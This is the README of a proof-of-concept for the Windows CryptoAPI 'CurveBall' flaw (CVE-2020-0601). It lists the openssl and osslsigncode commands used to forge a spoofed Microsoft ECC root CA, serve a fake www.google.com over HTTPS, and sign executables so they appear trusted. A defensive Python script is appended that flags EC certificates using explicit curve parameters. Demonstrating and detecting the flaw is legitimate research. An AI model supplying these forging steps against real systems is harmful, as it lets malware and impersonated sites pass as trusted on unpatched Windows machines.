
CVE-2020-0601 PoC — Microsoft Windows CryptoAPI trust management vulnerability

Associated Vulnerability
Title: Microsoft Windows CryptoAPI trust management vulnerability (CVE-2020-0601)
Description: A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source, aka 'Windows CryptoAPI Spoofing Vulnerability'.
Description
Demonstration of CVE-2020-0601, aka CurveBall. Based on the PoCs available at https://github.com/kudelskisecurity/chainoffools and https://github.com/ly4k/CurveBall
Readme
# Based on PoCs https://github.com/ly4k/CurveBall
# https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/
# https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file

-----------------------------
# REQUIREMENTS/SOFTWARE USED
-----------------------------

python version 3.11
openssl version 3.1
osslsigncode version 2.5
Python libraries imported by gen-key.py and httpServer.py

-------------------------
# TLS CERTIFICATE SIGNING
-------------------------

# Create a spoofed CA key from the trusted root certificate (must be secp384r1 and in PEM format)
python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

# Create a spoofed CA using the spoofed key
openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf

# Create another SSL certificate (of any kind) that will be signed by the spoofed CA
openssl ecparam -name secp384r1 -genkey -noout -out cert.key

# Create a certificate signing request for the certificate
openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req

# Sign the CSR using the spoofed CA certificate
openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req

# Start an HTTPS server with the spoofed certificate chain
python httpServer.py

# IN WINDOWS MACHINE
# Add <kali.machine.ip> www.google.com to the hosts file (redirects google to the server)
# Visit https://www.google.com
# Certificate should be trusted, and 'Hello World' should be displayed
# If error occurs, check system time is correct


--------------
# CODE SIGNING
--------------

# Create a spoofed CA key from the trusted root certificate (must be secp384r1 and in PEM format)
python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

# Create a spoofed CA using the spoofed key
openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf

# Create a new key that can be used for code signing
openssl ecparam -name secp384r1 -genkey -noout -out cert.key

# Create a certificate signing request using the key, which we can sign
openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req

# Sign the CSR using the spoofed CA
openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req

# Pack the key, certificate, and spoofed CA into a PKCS12 file for signing exes
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12

# Use the PKCS12 file to sign an executable
osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe
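A defender-side check for both procedures above (the TLS chain and the code-signing chain), added here as an example and not part of this PoC or of the referenced projects. What both chains have in common is the key produced by gen-key.py: a secp384r1 key whose certificate carries explicit ECParameters (field, curve, generator, order) in the SubjectPublicKeyInfo instead of the named-curve OID for secp384r1. Public CA certificates use the named-curve form, so a CA certificate with explicit parameters is a strong indicator of this attack, and the patched crypt32.dll logs an Audit-CVE event for such chains. The script walks a DER certificate with a small stdlib-only parser and flags every EC public key whose parameters are not a named curve. All function names are mine; the two sample certificates are constructed from placeholder values (no real keys or curve constants) so the block runs offline, and `pem_to_der` lets it be pointed at a real `.pem` or `.crt` file.

```python
import base64

# Added defensive example, not code from this PoC or the referenced projects.
# Flags EC public keys whose AlgorithmIdentifier parameters are explicit
# ECParameters (SEQUENCE) or implicitlyCA (NULL) rather than a namedCurve OID.
# The DER encoder at the bottom exists only to build constructed sample input.

ID_EC_PUBLIC_KEY = "1.2.840.10045.2.1"
SECP384R1 = "1.3.132.0.34"

def _read_tlv(data, pos):
    """Parse one DER TLV at pos -> (tag, value, position after it)."""
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:                                  # long-form length
        n, pos = length & 0x7F, pos + (length & 0x7F)
        length = int.from_bytes(data[pos - n:pos], "big")
    return tag, data[pos:pos + length], pos + length

def _children(value):
    pos = 0
    while pos < len(value):
        tag, v, pos = _read_tlv(value, pos)
        yield tag, v

def _decode_oid(value):
    arcs, n = [str(value[0] // 40), str(value[0] % 40)], 0
    for b in value[1:]:
        n = (n << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(str(n))
            n = 0
    return ".".join(arcs)

def find_ec_params(der):
    """Return (kind, curve_oid) for every id-ecPublicKey AlgorithmIdentifier in the cert."""
    found = []

    def walk(value):
        kids = list(_children(value))
        if len(kids) == 2 and kids[0][0] == 0x06 and _decode_oid(kids[0][1]) == ID_EC_PUBLIC_KEY:
            ptag, pval = kids[1]                       # 0x06 namedCurve, 0x30 explicit, 0x05 implicitlyCA
            found.append(("named", _decode_oid(pval)) if ptag == 0x06
                         else ({0x30: "explicit", 0x05: "implicitlyCA"}.get(ptag, "unknown"), None))
            return
        for tag, v in kids:
            if tag & 0x20:                             # constructed node: descend
                walk(v)

    walk(der)
    return found

def check_certificate(der):
    params = find_ec_params(der)
    bad = [p for p in params if p[0] != "named"]
    return {"ec_keys": len(params), "non_named": len(bad), "suspicious": bool(bad)}

def pem_to_der(pem):
    body = "".join(l for l in pem.splitlines() if l and not l.startswith("-----"))
    return base64.b64decode(body)

# --- constructed sample certificates (placeholder values, not real keys) ---
def _tlv(tag, value):
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value

def _oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    body = [40 * arcs[0] + arcs[1]]
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        while a >> 7:                                  # base-128 with continuation bits
            a >>= 7
            chunk.insert(0, 0x80 | (a & 0x7F))
        body += chunk
    return _tlv(0x06, bytes(body))

def _spki(params):
    point = b"\x04" + b"\x11" * 96                     # placeholder uncompressed point
    return _tlv(0x30, _tlv(0x30, _oid(ID_EC_PUBLIC_KEY) + params) + _tlv(0x03, b"\x00" + point))

def _explicit_params():
    # ECParameters { version, fieldID, curve, base, order, cofactor } with dummy values
    field = _tlv(0x30, _oid("1.2.840.10045.1.1") + _tlv(0x02, b"\x00" + b"\xff" * 48))
    curve = _tlv(0x30, _tlv(0x04, b"\x01" * 48) + _tlv(0x04, b"\x02" * 48))
    return _tlv(0x30, _tlv(0x02, b"\x01") + field + curve + _tlv(0x04, b"\x04" + b"\x03" * 96)
                + _tlv(0x02, b"\x00" + b"\xff" * 48) + _tlv(0x02, b"\x01"))

def _certificate(spki):
    name = _tlv(0x30, _tlv(0x31, _tlv(0x30, _oid("2.5.4.3") + _tlv(0x13, b"Constructed Test CA"))))
    sig_alg = _tlv(0x30, _oid("1.2.840.10045.4.3.3"))  # ecdsa-with-SHA384
    validity = _tlv(0x30, _tlv(0x17, b"200101000000Z") + _tlv(0x17, b"300101000000Z"))
    tbs = _tlv(0x30, _tlv(0xA0, _tlv(0x02, b"\x02")) + _tlv(0x02, b"\x01") + sig_alg + name + validity + name + spki)
    return _tlv(0x30, tbs + sig_alg + _tlv(0x03, b"\x00" * 65))   # dummy signature, never verified

NAMED_CURVE_CERT = _certificate(_spki(_oid(SECP384R1)))
EXPLICIT_PARAMS_CERT = _certificate(_spki(_explicit_params()))
```

`check_certificate(pem_to_der(open("spoofed-ca.pem").read()))` reports `suspicious: True` for a CA whose key was emitted with explicit parameters and `False` for a root that carries the secp384r1 OID. The walker does not verify signatures or chain building; it only answers the one question the patch also asks, namely whether any EC key in the certificate avoids the named-curve encoding, which makes it cheap to run over a certificate store, a PKCS#12 bundle, or chains extracted from TLS or Authenticode signatures.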


